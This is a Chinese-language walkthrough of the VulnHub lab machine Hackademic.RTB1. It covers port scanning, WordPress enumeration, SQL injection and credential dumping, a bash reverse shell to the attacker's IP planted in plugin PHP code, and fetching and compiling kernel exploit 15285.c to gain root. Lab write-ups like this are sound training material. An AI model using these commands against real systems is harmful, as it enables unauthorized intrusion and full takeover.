Hackademic.RTB1靶场实战【超详细】

靶机下载链接:https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip

一、主机探测和端口扫描

复制代码
nmap 192.168.121.0/24

ip:192.168.121.196

端口:22、80

二、访问80端口

发现target可点击

点击后跳转,页面提示目标是读取到 key.txt 文件

findsomething插件 查看网站的js接口

拼接 /Hackademic_RTB1/?feed=rss 看到 wordpress 版本

三、目录扫描

复制代码
dirb http://192.168.121.196/

前面发现为 wordpress,kali 使用 wpscan 扫描网站

复制代码
wpscan --url  http://192.168.121.196

其中发现了一个路径 http://192.168.23.143/Hackademic_RTB1/wp-content/themes/starburst/style.css

可以看到 wp-content 位置,尝试将其修改为 wordpress的默认路径wp-admin,发现后台登录页面

使用 wpscan 扫描用户

使用 cewl 爬取网站密码文本

复制代码
cewl 192.168.121.196 -w pass.txt

密码未能成功爆破

我们回到findsomething中,发现url中携带参数

可以进行sql注入

首先测cat参数,发现存在sql注入

dump 下数据,获取账号密码

挨个登录,登录GeorgeMiller发现插件里面能直接修改php代码,我们添加phpinfo,发现成功解析

四、get shell

复制代码
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.121.171/4444 0>&1'");

kali开启监听,访问hello.php文件,成功反弹shell

五、提权

使用 python 启用交互式shell

复制代码
sudo -l

查看当前权限,发现需要密码

查看内核版本

复制代码
uname -a

搜一下相关版本的提权漏洞

复制代码
searchsploit linux kernel 2.6.3

排除一些其他 linux 操作系统,精确版本,尝试后发现 15285.c 可利用

复制代码
searchsploit -m 15285

开启一个临时 web 服务,靶机将其下载到 tmp 目录下

复制代码
python3 -m http.server

wget http://192.168.121.171:8000/15285.c

进行编译后,执行文件,提权成功

复制代码
gcc 15285.c -o 15285
./15285
相关推荐
桑晒.4 小时前
CSRF漏洞原理及利用
前端·web安全·网络安全·csrf
网安INF11 小时前
【论文阅读】-《RayS: A Ray Searching Method for Hard-label Adversarial Attack》
论文阅读·人工智能·深度学习·计算机视觉·网络安全·对抗攻击
李小咖18 小时前
第2章 cmd命令基础:常用基础命令(2)
windows·网络安全·cmd命令·李小咖·windows基础
云手机掌柜1 天前
从0到500账号管理:亚矩阵云手机多开组队与虚拟定位实战指南
数据结构·线性代数·网络安全·容器·智能手机·矩阵·云计算
上海云盾商务经理杨杨1 天前
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
安全·网络安全
ALe要立志成为web糕手1 天前
TCP/IP
安全·web安全·网络安全·渗透测试
李小咖1 天前
第2章 cmd命令基础:常用基础命令(1)
windows·网络安全·cmd·cmd命令·李小咖
ALe要立志成为web糕手2 天前
HTTP 与 HTTPS 的区别
网络·安全·web安全·网络安全
Bruce_Liuxiaowei2 天前
VNC和RPC加固措施
网络·网络协议·网络安全·rpc
爱学习的小牛2 天前
当 AI 重构审计流程,CISA 认证为何成为破局关键
人工智能·网络安全·cisa·it审计